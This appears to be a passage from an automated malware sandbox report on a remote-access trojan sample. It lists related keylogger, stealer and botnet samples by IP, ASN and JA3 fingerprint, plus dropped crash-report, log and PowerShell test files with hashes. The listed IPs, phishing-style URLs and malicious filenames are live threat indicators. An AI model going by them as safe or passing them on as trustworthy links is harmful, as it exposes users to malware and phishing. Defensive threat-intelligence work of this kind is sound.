                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    iENcsTur6E.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    2tKeEoCCCw.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    173090160965f4af6053e0cc550b1580793735ec4c6bd2a63005d1f358aeab4a3375f6790f876.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    SecuriteInfo.com.FileRepMalware.29777.16321.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                    • 149.154.167.220

                                                                                                                                                                    ASNs

                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                    TELEGRAMRUhttps://berg.bergssrom.mom/fer.to.php.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 149.154.170.96
                                                                                                                                                                    FmmYUD4pt7.wsfGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    05.11.241591883_UyeIsyeriCalismanKosullari.xlxs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    x6BqJ693rc.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    doc20247622056002_pentamix.batGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    5gz6ZZRQWh.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    46roqD3HEE.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    iENcsTur6E.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    2tKeEoCCCw.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    173090160965f4af6053e0cc550b1580793735ec4c6bd2a63005d1f358aeab4a3375f6790f876.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                    • 172.67.133.135
                                                                                                                                                                    nuklear.arm.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                    • 1.13.38.145
                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, HTMLPhisher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                    • 104.21.5.155
                                                                                                                                                                    https://www.wallpaperflare.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                    • 104.21.5.155
                                                                                                                                                                    2pKmZ1M9Je.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                    • 104.19.229.21
                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                    • 172.67.133.135
                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Remcos, Amadey, LummaC Stealer, Stealc, Vidar, WhiteSnake StealerBrowse
                                                                                                                                                                    • 104.21.5.155
                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                    • 104.21.5.155
                                                                                                                                                                    Hesap.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                    ORACLE-BMC-31898USFiyat teklifi iste#U011fi.bat.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                    • 158.101.44.242
                                                                                                                                                                    QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                    • 158.101.44.242
                                                                                                                                                                    05.11.241591883_UyeIsyeriCalismanKosullari.xlxs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 193.122.6.168
                                                                                                                                                                    hesaphareketi-01.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                    • 193.122.6.168
                                                                                                                                                                    x6BqJ693rc.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 158.101.44.242
                                                                                                                                                                    vHXObqOSGu.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 193.122.130.0
                                                                                                                                                                    z349dth1eOtMzxuuRN.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                    • 193.122.130.0
                                                                                                                                                                    46roqD3HEE.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                    • 158.101.44.242
                                                                                                                                                                    46roqD3HEE.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                    • 158.101.44.242
                                                                                                                                                                    iENcsTur6E.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                    • 158.101.44.242
                                                                                                                                                                    NETMAGIC-APNetmagicDatacenterMumbaiINla.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 123.108.36.64
                                                                                                                                                                    la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 103.225.99.96
                                                                                                                                                                    la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 203.112.146.8
                                                                                                                                                                    ATT037484_Msg#189815.htmlGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                                                                                                    • 164.52.219.207
                                                                                                                                                                    na.elfGet hashmaliciousGafgytBrowse
                                                                                                                                                                    • 103.214.114.30
                                                                                                                                                                    na.elfGet hashmaliciousGafgytBrowse
                                                                                                                                                                    • 103.214.114.27
                                                                                                                                                                    http://www.ledger-secure03948.sssgva.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                    • 103.117.156.152
                                                                                                                                                                    https://sarikarubber.com/-3001f1f2fddd/jdss/portal/dhlEN/a1b2c3/ffe5f458522a686e8e5c641bfd6a0d85/start/Get hashmaliciousUnknownBrowse
                                                                                                                                                                    • 202.66.174.167
                                                                                                                                                                    Complete with Docusign amazar@actuatetherapeutics.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 103.120.179.103
                                                                                                                                                                    vnc.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 103.20.212.156

                                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                    54328bd36c14bd82ddaa0c04b25ed9adFiyat teklifi iste#U011fi.bat.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                    Fiyat teklifi iste#U011fi.bat.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                    QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                    QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                    PO#I-24-0000217.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                    05.11.241591883_UyeIsyeriCalismanKosullari.xlxs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                    QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                    hesaphareketi-01.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                    x6BqJ693rc.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                    z349dth1eOtMzxuuRN.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                    • 188.114.97.3

                                                                                                                                                                    Dropped Files

                                                                                                                                                                    No context

                                                                                                                                                                    Created / dropped Files

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_SecuriteInfo.com_8d96b27bd4f6beaf4e307dc949441114ee1ebb9a_bb6ce512_c8189691-9c38-45da-b19c-aa927c852a90\Report.wer

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):65536
                                                                                                                                                                    Entropy (8bit):1.1166071818800019
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:0EA3GlgT0BU/ya6ce36izuiF2Z24IO8h:nQGlgABU/yarVizuiF2Y4IO8h
                                                                                                                                                                    MD5:4BBB61980D1679FF09255A6D7F91AD4B
                                                                                                                                                                    SHA1:A1E9E452146A8E8CB3D5ECAFB5D18A0F00113E0D
                                                                                                                                                                    SHA-256:8AD5760F72EDC6B30F3B3F6206A5B4FE83A1B4AFD15ACE5CB6850E233C0DB2AE
                                                                                                                                                                    SHA-512:6EAEB269D4129F317CB90A6DB5DD7F76F144B4CCCE6D9B31951852D732C560D008724B014499BA19564081FFF3847552CCDDEE77FB5D0CB196E5B6336AE7F333
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.4.3.0.4.1.5.9.3.8.4.4.2.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.4.3.0.4.1.6.4.8.5.3.1.3.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.8.1.8.9.6.9.1.-.9.c.3.8.-.4.5.d.a.-.b.1.9.c.-.a.a.9.2.7.c.8.5.2.a.9.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.1.f.3.c.6.d.0.-.b.5.4.2.-.4.8.d.1.-.a.5.b.7.-.6.7.0.7.2.8.a.5.c.5.2.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...W.i.n.3.2...R.A.T.X.-.g.e.n...3.0.3.0...2.3.8.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.H.C.U.m.k.e.A.j.D.P.T...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.0.8.-.0.0.0.1.-.0.0.1.4.-.6.0.1.a.-.3.3.b.4.d.4.3.0.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.2.0.3.9.4.1.7.b.e.7.d.8.3.4.e.1.b.c.1.a.1.f.f.3.b.b.2.b.3.8.e.0.0.0.0.0.0.0.0.!.0.0.0.

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER8E2A.tmp.dmp

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    File Type:Mini DuMP crash report, 15 streams, Thu Nov 7 05:20:16 2024, 0x1205a4 type
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):270198
                                                                                                                                                                    Entropy (8bit):3.731097297072097
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:4PuwiKguBojRDapN4uE2aOu3SVXdCELTgdnP17NsKb0jAfSTQqN5CDGtTfU8UUl5:muHnDc4uEqmyYELTgCKgwAeUKq5iF
                                                                                                                                                                    MD5:CE363201B6BD11AC1D822DA6AC88E5A5
                                                                                                                                                                    SHA1:15C412C49B72FE7D68B3F812704DEE2E50A649BE
                                                                                                                                                                    SHA-256:B2E6EAB1A1CE12B5BD23AC3B98C11D9E45F789A7569B30D48B3E2BBB886789AE
                                                                                                                                                                    SHA-512:95BBF7E01AD56A62CA6562731565190FFF5082029D9EE3097260AD75281AD50BCAF91491F38DAD3FA2B7FECD93D22C1041DA88E18E22B352194C226E24B1348E
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:MDMP..a..... ........N,g............D...............X.......<....#......T%...S..........`.......8...........T............;..............,$...........&..............................................................................eJ.......&......GenuineIntel............T............N,g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER8F92.tmp.WERInternalMetadata.xml

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):6448
                                                                                                                                                                    Entropy (8bit):3.7289878275782216
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:RSIU6o7wVetbYfn6omYUjv4xuQE/Z5D5aM4UT89b2GIsfQwcm:R6l7wVeJan6RY440pprT89bxIsfQbm
                                                                                                                                                                    MD5:3DF2B6BC047E578A8252BC14AA36331A
                                                                                                                                                                    SHA1:234A3F807F40E005E349A66B96E6CB064214FC2D
                                                                                                                                                                    SHA-256:09A67F648305B36AF97E06B2D8EE27DE44630058F8E09CF6945504105D29F8EA
                                                                                                                                                                    SHA-512:5F968603C8114033A62B43F0FF5EC2D34953A852A73AC078B1438E6F89432A42ACC4C5510465ADAB726D3190514CD7AAA30F2271D9EE332C53382BF36C51C9CA
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.1.7.6.<./.P.i.

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER8FC2.tmp.xml

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):4822
                                                                                                                                                                    Entropy (8bit):4.568620513503551
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:cvIwWl8zszJg77aI9JWWpW8VYBPYm8M4JajFmmo+q8Si4VZeZd:uIjfNI7r37VcSJZmoycZud
                                                                                                                                                                    MD5:C842AC48BE59E431637BB4D53C56318B
                                                                                                                                                                    SHA1:3D7426CFCAE0FD4AC382DF790ADF9E38141D10A1
                                                                                                                                                                    SHA-256:5AFC5E3E4B32956AD55EF19E3FC1DBB5CD5E8AAEB03724DAEBD1EA2DA61B59DA
                                                                                                                                                                    SHA-512:7A7DADD856F11EB85CA4C6595EDC109E92F7E0B6653FD0F3EE13D2A06C56A53155A16D5D282370530FF7CCD7B8D48E9E05984E60319D054A1ACCFA7FC426C9CB
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="577222" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.log

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1216
                                                                                                                                                                    Entropy (8bit):5.34331486778365
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                                                                    MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                                                                    SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                                                                    SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                                                                    SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\zDAKFK.exe.log

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Roaming\zDAKFK.exe
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1216
                                                                                                                                                                    Entropy (8bit):5.34331486778365
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                                                                    MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                                                                    SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                                                                    SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                                                                    SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):2232
                                                                                                                                                                    Entropy (8bit):5.380192968514367
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:+WSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeoPUyus:+LHyIFKL3IZ2KRH9OugYs
                                                                                                                                                                    MD5:9AA3EC09E507E3B6521730FDDCF550A3
                                                                                                                                                                    SHA1:19E688C78EB2FBE0D620C0055293DA06411512D0
                                                                                                                                                                    SHA-256:E50F69B84C0E4B5D2CFE80C5B7B4AF6398A862F098D06B138388F7D49ABAB0B8
                                                                                                                                                                    SHA-512:04B3A49C7FB0DFFF413095AB046296C779A1978D64CDAE35858435A5E41221AE6726421F1FB116EBF7E2DB314602A544F5C8AD7F0F96FCC04D694AD6C1E78E81
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0fdayoqa.0xn.ps1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2bhtwbfa.13b.psm1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lavta1wo.vtx.ps1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n1movobj.lc3.ps1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
